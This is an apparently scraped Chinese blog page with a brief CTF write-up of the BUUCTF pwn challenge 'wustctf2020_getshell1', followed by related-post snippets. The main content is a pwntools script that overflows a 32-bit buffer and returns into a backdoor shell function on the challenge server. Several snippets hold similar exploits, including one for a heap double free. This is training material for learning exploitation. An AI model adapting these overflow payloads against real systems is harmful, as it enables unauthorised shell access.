BUUCTF-wustctf2020_getshell1

最新推荐文章于 2024-11-19 16:39:22 发布

原创最新推荐文章于 2024-11-19 16:39:22 发布 · 733 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#pwn #安全 #linux

BUUCTF 专栏收录该内容

34 篇文章

订阅专栏

checksec

IDA

这题没有什么过多解释的,就是一道简单的ret2text,有shell的地址

应该是太简单了做的人少就放在了BUUCTF的第二页,按照顺序做的,也就写上了

EXP

from pwn import*

r=remote('node4.buuoj.cn',27245)

shell_addr=0x804851B

payload='a'*(0x18+4)+p32(shell_addr)

r.sendline(payload)

r.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

wustctf2020_getshell

m0sway的博客

11-28

871

wustctf2020_getshell 使用checksec查看：只开启了一个栈不可执行，没开Canary，考虑栈溢出题目。拉进IDA中查看：主函数中直接给漏洞函数，跟进： read()函数，能读取0x20的数据，buf距离ebp0x18，因为这是个32位的程序，ebp+4后还能放下一个one_gadget 首先考虑下这个程序本身有没有get_shell的函数，通过搜索字符串可以发现函数shell()： ok了，这题直接秒了。 exp： from pwn import * #start

BUUCTF wustctf2020_getshell

2401_88087539的博客

02-08

253

pwn新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正

参与评论您还未登录，请先登录后发表或查看评论

[buuctf]wustctf2020_getshell

逆向萌新的博客

07-02

861

[buuctf]wustctf2020_getshell

BUUCTF】wustctf2020_getshell 1（自留用）

2302_79275647的博客

11-19

867

（注意：nc node5.buuoj.cn 25369即nc+地址+端口号）（有的新版本需要格式【checksec --file=文件名】查看）{具体保护权限可以搜索关键词“pwn基础保护”或相关的文（引用致歉）在CTFOS里需要【pwn checksec --file=文件名】（有的版本终端直接输入【checksec+文件名】就可以查看）（有疑问可以问AI“pwn题目里为什么要寻找shell函数”）有疑问可以问AI“pwn题目里为什么要寻找main函数”输入【wget (空格) 复制的链接】

[BUUCTF]PWN——wustctf2020_getshell

BangSen1的博客

03-30

359

wustctf2020_getshell 例行检查，开启NX保护，32位，运行一下，打印出一个图形。用IDA打开。看到了关键函数。 shelladdr=0x804851B 查看主函数，buf的长度为0x18，读取的长度为0x20，可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',28128) shelladdr=0x804851B payload='a'*(0x18+4)+p32(shelladdr) r.sendline(payl

buuctf wustctf2020_getshell_2 ret2shellcode

weixin_45441024的博客

12-01

784

BUUCTF wustctf2020_getshell_2 check一下，32位的程序且没有开任何保护用ida打开，vuln很明显这是一个漏洞函数，f5查看一下伪代码，可以看到buf距离栈底0x18个字节这是shell函数的伪代码，我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用，那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe

[BUUCTF-pwn]——wustctf2020_getshell_2

Y_peak的博客

03-19

557

[BUUCTF-pwn]——wustctf2020_getshell_2 有system没有sh。所以找一下 exploit from pwn import * p = remote('node3.buuoj.cn',25464) sh = 0x08048670 payload = 'a' * (0x18 + 4) + p32(0x08048529) + p32(sh) p.sendline(payload) p.interactive()

BUUCTF pwn——wustctf2020_getshell_2

CNS-Enterprise BCC-1701-J

05-23

301

BUUCTF 做题练习

[BUUCTF]pwn - wustctf2020_easyfast (Use After Free)

半岛铁盒的博客

06-10

525

打开菜单,了解到相应的功能后,改一下名字这个漏洞大致利用方式是这样的; 利用思路通过double free修改chunk0的fd指针，让申请到的chunk能够覆盖到0x602090，修改1为0，最后直接调用backdoor来getshell from pwn import * #p=process('./wustctf2020_easyfast') p=remote("node3.buuoj.cn",25044) context.log_level="debug" def add(si

[WUSTCTF 2020]getshell

m0_74355719的博客

11-29

392

栈溢出。

[BUUCTF]PWN——wustctf2020_getshell1/2

mcmuyanga的博客

11-11

1778

wustctf2020_getshell 附件步骤：例行检查，32位程序，开启了NX保护本地试运行一下程序，看看大概的情况 32位ida载入，习惯性的检索程序里的字符串，发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞，正好溢出8位，让我们覆盖到ret exp： from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B

[BUUCTF-pwn]——wustctf2020_getshell

Y_peak的博客

03-16

247

[BUUCTF-pwn]——wustctf2020_getshell 额，太简单了直接上exploit吧直接利用栈溢出，修改返回地址就好 from pwn import * p = remote('node3.buuoj.cn',28241) payload = 'a' * (0x18+4) + p32(0x0804851B) p.send(payload) p.interactive()

buuctf-web-[SUCTF 2018]GetShell1

mlws1900的博客

03-12

568

利用的是UTF-8编码的某个汉字，并将其中某个字符取出来，比如'和'{2}的结果是"\x8c"，其取反即为字母s。没写禁止哪些参数，fuzz一下。查看上传上去的文件，发现可解析。不用多说，文件上传，打开环境。只有一个主界面和文件上传界面。使用的是位运算里的“取反”。修改文件内容为以上代码。构造payload为。

BUUCTF pwn——wustctf2020_getshell

CNS-Enterprise BCC-1701-J

05-02

212

BUUCTF 做题练习

wustctf2020_getshell_2

m0_73756460的博客

01-14

187

buuctf刷题 wustctf2020_getshell_2（writeup）

BUUCTF--Web-[WUSTCTF2020]颜值成绩查询